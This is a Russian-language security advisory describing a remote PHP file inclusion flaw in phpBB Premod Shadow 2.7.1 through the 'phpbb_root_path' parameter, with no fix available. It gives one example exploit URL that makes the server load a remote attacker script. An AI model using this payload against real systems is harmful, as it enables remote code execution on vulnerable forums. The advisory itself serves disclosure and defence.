PHP-инклюдинг в phpBB Premod Shadow

Дата публикации:
08.09.2006
Всего просмотров:
6906
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpBB Premod Shadow 2.x
Уязвимые версии: phpBB Premod Shadow 2.7.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions_portal.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]

URL производителя: premod-shadow.info

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Shadow Prйmod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability

или введите имя

CAPTCHA